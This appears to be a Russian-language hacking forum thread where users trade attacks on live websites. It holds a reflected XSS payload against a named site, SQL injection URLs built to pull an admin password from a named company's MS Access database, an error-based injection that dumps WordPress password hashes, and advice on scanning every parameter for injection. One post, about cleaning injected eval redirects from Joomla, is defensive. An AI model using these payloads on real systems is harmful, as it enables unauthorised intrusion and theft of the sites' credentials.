Подскажите что можно сделать http://www.mywed.ru/photographer/popular/ вбивая в строку поиска '"><script>alert('a');</script> нажимаем найти получаем ошибку, и потом кликаем на ссылку войти отрабатывает alert() Как это использовать можно.
Помогиет кто-нить раскурить эту ссылку... Если не трудно в ЛС... что и как вы сделали... там вроде как MSAccess но с данной СУБД у меня ничего не получается(( Code: http://www.mooeraudio.com/en/ProductInfo.asp?id=13
Угу. Это MsAccess _ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,111222333444,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminuser%00 _ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,(select+top+1+cstr([adminpwd])+from+(select+top+1+*+from+(select+top+1+*+from+[adminuser]+order+by+1)+t+order+by+1+desc)t),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminuser%00 4 самых важных момента 1) Выборка всегда должна идти из какой-либо таблицы, иначе запрос некорректен 2) Для отсечения зпроса работает только нулл байт %00 или %16 3) Все таблицы/колонки подбираются в слепую, при условии что не доступны сисемные таблички. 4) Для конвертирования получаемых данных в строковый тип используй cstr()
Приветствую, помогающие! Подскажите как быстро избавится от eval, в скриптах? Очень часто сталкиваюсь, что весь joomla сайт, включая системные скрипты, файлов шаблонов подвержен вставкам eval. Скорее всего вставляют автоматом, т.к. все в одном месте (расположение eval'ов), все eval одни и те же - редиректят мобильный траф.
Как можно с высокой долей вероятности определить наличие SQLi? В данный момент подставляю '%20group%20by%201%20-- во все параметры, а потом '%20group%20by%201000%20--, поидее если парамет текстовый и есть скуля будет разница в размере(в данный момент скрипт считает, что есть скуля при разнице в 500 байт, это нормальная чувствительность?) страницы. Жизнеспособный подход? Или может есть вариант лучше? Заранее спасибо.
Ребят помогите разобрать запрос : нужно чтоб выводил (user_login,0x7e,user_pass) where+ID=1 никак не разберу. Ну или хотяб подскажите прогу или сервисы чтоб значения символов самими символави заменял(%20=+ %28=( %29=) и т.д.) 1%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20%28select%20concat%280x27%2C0x7e%2Cwp_users.user_pass%2C0x27%2C0x7e%29%20from%20%60kazachstan%60.wp_users%20Order%20by%20user_login%20limit%200%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1
А если %20 фильтруется ? А если -- ?? А если group by ? Абсолютно неверный подход имхо. notepad.exe - Win+R - Заменить (%20) на (+) Аналогично всё остальное
Как вывести несколько строчек из бд при выводе через ошибки? Или допустим сначал 1 потом 2 Пишу limit 0,1 выводит 1 стоку ,а пишу limit 0,2 вываливает ошибку
